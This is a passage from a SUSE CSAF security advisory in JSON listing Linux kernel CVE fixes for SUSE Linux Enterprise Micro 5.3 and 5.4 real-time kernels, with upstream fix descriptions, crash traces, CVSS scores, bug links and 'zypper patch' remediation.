"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53412",
"url": "https://www.suse.com/security/cve/CVE-2023-53412"
},
{
"category": "external",
"summary": "SUSE Bug 1254462 for CVE-2023-53412",
"url": "https://bugzilla.suse.com/1254462"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2023-53412"
},
{
"cve": "CVE-2023-53417",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53417"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nUSB: sl811: fix memory leak with using debugfs_lookup()\n\nWhen calling debugfs_lookup() the result must have dput() called on it,\notherwise the memory will leak over time. To make things simpler, just\ncall debugfs_lookup_and_remove() instead which handles all of the logic\nat once.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53417",
"url": "https://www.suse.com/security/cve/CVE-2023-53417"
},
{
"category": "external",
"summary": "SUSE Bug 1254463 for CVE-2023-53417",
"url": "https://bugzilla.suse.com/1254463"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2023-53417"
},
{
"cve": "CVE-2023-53418",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53418"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nUSB: gadget: lpc32xx_udc: fix memory leak with using debugfs_lookup()\n\nWhen calling debugfs_lookup() the result must have dput() called on it,\notherwise the memory will leak over time. To make things simpler, just\ncall debugfs_lookup_and_remove() instead which handles all of the logic\nat once.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53418",
"url": "https://www.suse.com/security/cve/CVE-2023-53418"
},
{
"category": "external",
"summary": "SUSE Bug 1254464 for CVE-2023-53418",
"url": "https://bugzilla.suse.com/1254464"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2023-53418"
},
{
"cve": "CVE-2024-26581",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-26581"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_set_rbtree: skip end interval element from gc\n\nrbtree lazy gc on insert might collect an end interval element that has\nbeen just added in this transaction, skip end interval elements that\nare not yet active.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-26581",
"url": "https://www.suse.com/security/cve/CVE-2024-26581"
},
{
"category": "external",
"summary": "SUSE Bug 1220144 for CVE-2024-26581",
"url": "https://bugzilla.suse.com/1220144"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2024-26581"
},
{
"cve": "CVE-2024-26832",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-26832"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm: zswap: fix missing folio cleanup in writeback race path\n\nIn zswap_writeback_entry(), after we get a folio from\n__read_swap_cache_async(), we grab the tree lock again to check that the\nswap entry was not invalidated and recycled. If it was, we delete the\nfolio we just added to the swap cache and exit.\n\nHowever, __read_swap_cache_async() returns the folio locked when it is\nnewly allocated, which is always true for this path, and the folio is\nref\u0027d. Make sure to unlock and put the folio before returning.\n\nThis was discovered by code inspection, probably because this path handles\na race condition that should not happen often, and the bug would not crash\nthe system, it will only strand the folio indefinitely.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-26832",
"url": "https://www.suse.com/security/cve/CVE-2024-26832"
},
{
"category": "external",
"summary": "SUSE Bug 1223007 for CVE-2024-26832",
"url": "https://bugzilla.suse.com/1223007"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2024-26832"
},
{
"cve": "CVE-2024-46854",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-46854"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: dpaa: Pad packets to ETH_ZLEN\n\nWhen sending packets under 60 bytes, up to three bytes of the buffer\nfollowing the data may be leaked. Avoid this by extending all packets to\nETH_ZLEN, ensuring nothing is leaked in the padding. This bug can be\nreproduced by running\n\n\t$ ping -s 11 destination",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-46854",
"url": "https://www.suse.com/security/cve/CVE-2024-46854"
},
{
"category": "external",
"summary": "SUSE Bug 1231084 for CVE-2024-46854",
"url": "https://bugzilla.suse.com/1231084"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2024-46854"
},
{
"cve": "CVE-2024-50143",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-50143"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nudf: fix uninit-value use in udf_get_fileshortad\n\nCheck for overflow when computing alen in udf_current_aext to mitigate\nlater uninit-value use in udf_get_fileshortad KMSAN bug[1].\nAfter applying the patch reproducer did not trigger any issue[2].\n\n[1] https://syzkaller.appspot.com/bug?extid=8901c4560b7ab5c2f9df\n[2] https://syzkaller.appspot.com/x/log.txt?x=10242227980000",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-50143",
"url": "https://www.suse.com/security/cve/CVE-2024-50143"
},
{
"category": "external",
"summary": "SUSE Bug 1233038 for CVE-2024-50143",
"url": "https://bugzilla.suse.com/1233038"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2024-50143"
},
{
"cve": "CVE-2024-54031",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-54031"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nft_set_hash: unaligned atomic read on struct nft_set_ext\n\nAccess to genmask field in struct nft_set_ext results in unaligned\natomic read:\n\n[ 72.130109] Unable to handle kernel paging request at virtual address ffff0000c2bb708c\n[ 72.131036] Mem abort info:\n[ 72.131213] ESR = 0x0000000096000021\n[ 72.131446] EC = 0x25: DABT (current EL), IL = 32 bits\n[ 72.132209] SET = 0, FnV = 0\n[ 72.133216] EA = 0, S1PTW = 0\n[ 72.134080] FSC = 0x21: alignment fault\n[ 72.135593] Data abort info:\n[ 72.137194] ISV = 0, ISS = 0x00000021, ISS2 = 0x00000000\n[ 72.142351] CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n[ 72.145989] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n[ 72.150115] swapper pgtable: 4k pages, 48-bit VAs, pgdp=0000000237d27000\n[ 72.154893] [ffff0000c2bb708c] pgd=0000000000000000, p4d=180000023ffff403, pud=180000023f84b403, pmd=180000023f835403,\n+pte=0068000102bb7707\n[ 72.163021] Internal error: Oops: 0000000096000021 [#1] SMP\n[...]\n[ 72.170041] CPU: 7 UID: 0 PID: 54 Comm: kworker/7:0 Tainted: G E 6.13.0-rc3+ #2\n[ 72.170509] Tainted: [E]=UNSIGNED_MODULE\n[ 72.170720] Hardware name: QEMU QEMU Virtual Machine, BIOS edk2-stable202302-for-qemu 03/01/2023\n[ 72.171192] Workqueue: events_power_efficient nft_rhash_gc [nf_tables]\n[ 72.171552] pstate: 21400005 (nzCv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)\n[ 72.171915] pc : nft_rhash_gc+0x200/0x2d8 [nf_tables]\n[ 72.172166] lr : nft_rhash_gc+0x128/0x2d8 [nf_tables]\n[ 72.172546] sp : ffff800081f2bce0\n[ 72.172724] x29: ffff800081f2bd40 x28: ffff0000c2bb708c x27: 0000000000000038\n[ 72.173078] x26: ffff0000c6780ef0 x25: ffff0000c643df00 x24: ffff0000c6778f78\n[ 72.173431] x23: 000000000000001a x22: ffff0000c4b1f000 x21: ffff0000c6780f78\n[ 72.173782] x20: ffff0000c2bb70dc x19: ffff0000c2bb7080 x18: 0000000000000000\n[ 72.174135] x17: ffff0000c0a4e1c0 x16: 0000000000003000 x15: 0000ac26d173b978\n[ 72.174485] x14: 
ffffffffffffffff x13: 0000000000000030 x12: ffff0000c6780ef0\n[ 72.174841] x11: 0000000000000000 x10: ffff800081f2bcf8 x9 : ffff0000c3000000\n[ 72.175193] x8 : 00000000000004be x7 : 0000000000000000 x6 : 0000000000000000\n[ 72.175544] x5 : 0000000000000040 x4 : ffff0000c3000010 x3 : 0000000000000000\n[ 72.175871] x2 : 0000000000003a98 x1 : ffff0000c2bb708c x0 : 0000000000000004\n[ 72.176207] Call trace:\n[ 72.176316] nft_rhash_gc+0x200/0x2d8 [nf_tables] (P)\n[ 72.176653] process_one_work+0x178/0x3d0\n[ 72.176831] worker_thread+0x200/0x3f0\n[ 72.176995] kthread+0xe8/0xf8\n[ 72.177130] ret_from_fork+0x10/0x20\n[ 72.177289] Code: 54fff984 d503201f d2800080 91003261 (f820303f)\n[ 72.177557] ---[ end trace 0000000000000000 ]---\n\nAlign struct nft_set_ext to word size to address this and\ndocument it.\n\npahole reports that this increases the size of elements for rhash and\npipapo in 8 bytes on x86_64.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-54031",
"url": "https://www.suse.com/security/cve/CVE-2024-54031"
},
{
"category": "external",
"summary": "SUSE Bug 1235905 for CVE-2024-54031",
"url": "https://bugzilla.suse.com/1235905"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2024-54031"
},
{
"cve": "CVE-2025-21658",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21658"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: avoid NULL pointer dereference if no valid extent tree\n\n[BUG]\nSyzbot reported a crash with the following call trace:\n\n BTRFS info (device loop0): scrub: started on devid 1\n BUG: kernel NULL pointer dereference, address: 0000000000000208\n #PF: supervisor read access in kernel mode\n #PF: error_code(0x0000) - not-present page\n PGD 106e70067 P4D 106e70067 PUD 107143067 PMD 0\n Oops: Oops: 0000 [#1] PREEMPT SMP NOPTI\n CPU: 1 UID: 0 PID: 689 Comm: repro Kdump: loaded Tainted: G O 6.13.0-rc4-custom+ #206\n Tainted: [O]=OOT_MODULE\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS unknown 02/02/2022\n RIP: 0010:find_first_extent_item+0x26/0x1f0 [btrfs]\n Call Trace:\n \u003cTASK\u003e\n scrub_find_fill_first_stripe+0x13d/0x3b0 [btrfs]\n scrub_simple_mirror+0x175/0x260 [btrfs]\n scrub_stripe+0x5d4/0x6c0 [btrfs]\n scrub_chunk+0xbb/0x170 [btrfs]\n scrub_enumerate_chunks+0x2f4/0x5f0 [btrfs]\n btrfs_scrub_dev+0x240/0x600 [btrfs]\n btrfs_ioctl+0x1dc8/0x2fa0 [btrfs]\n ? 
do_sys_openat2+0xa5/0xf0\n __x64_sys_ioctl+0x97/0xc0\n do_syscall_64+0x4f/0x120\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n[CAUSE]\nThe reproducer is using a corrupted image where extent tree root is\ncorrupted, thus forcing to use \"rescue=all,ro\" mount option to mount the\nimage.\n\nThen it triggered a scrub, but since scrub relies on extent tree to find\nwhere the data/metadata extents are, scrub_find_fill_first_stripe()\nrelies on a non-empty extent root.\n\nBut unfortunately scrub_find_fill_first_stripe() doesn\u0027t really expect\na NULL pointer for extent root, it uses extent_root to grab fs_info and\ntriggered a NULL pointer dereference.\n\n[FIX]\nAdd an extra check for a valid extent root at the beginning of\nscrub_find_fill_first_stripe().\n\nThe new error path is introduced by 42437a6386ff (\"btrfs: introduce\nmount option rescue=ignorebadroots\"), but that\u0027s pretty old, and later\ncommit b979547513ff (\"btrfs: scrub: introduce helper to find and fill\nsector info for a scrub_stripe\") changed how we do scrub.\n\nSo for kernels older than 6.6, the fix will need manual backport.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21658",
"url": "https://www.suse.com/security/cve/CVE-2025-21658"
},
{
"category": "external",
"summary": "SUSE Bug 1236208 for CVE-2025-21658",
"url": "https://bugzilla.suse.com/1236208"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-27T16:02:21Z",
"details": "moderate"
}
],
"title": "CVE-2025-21658"
},
{
"cve": "CVE-2025-21738",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21738"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nata: libata-sff: Ensure that we cannot write outside the allocated buffer\n\nreveliofuzzing reported that a SCSI_IOCTL_SEND_COMMAND ioctl with out_len\nset to 0xd42, SCSI command set to ATA_16 PASS-THROUGH, ATA command set to\nATA_NOP, and protocol set to ATA_PROT_PIO, can cause ata_pio_sector() to\nwrite outside the allocated buffer, overwriting random memory.\n\nWhile an ATA device is supposed to abort an ATA_NOP command, there does seem\nto be a bug either in libata-sff or QEMU, where either this status is not\nset, or the status is cleared before read by ata_sff_hsm_move().\nAnyway, that is most likely a separate bug.\n\nLooking at __atapi_pio_bytes(), it already has a safety check to ensure\nthat __atapi_pio_bytes() cannot write outside the allocated buffer.\n\nAdd a similar check to ata_pio_sector(), such that also ata_pio_sector()\ncannot write outside the allocated buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21738",
"url": "https://www.suse.com/security/cve/CVE-2025-21738"
},
{
"category": "external",
"summary": "SUSE Bug 1238917 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1238917"
},
{
"category": "external",
"summary": "SUSE Bug 1257118 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1257118"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Micro 5.3:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.3:kernel-source-rt-5.14.21-150400.15.145.1.noarch",
"SUSE Linux Enterprise Micro 5.4:kernel-rt-5.14.21-150400.15.145.1.x86_64",
"SUSE Linux Enterprise Micro 5.4:kernel-source-rt-5.14.21-150400.15.145.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
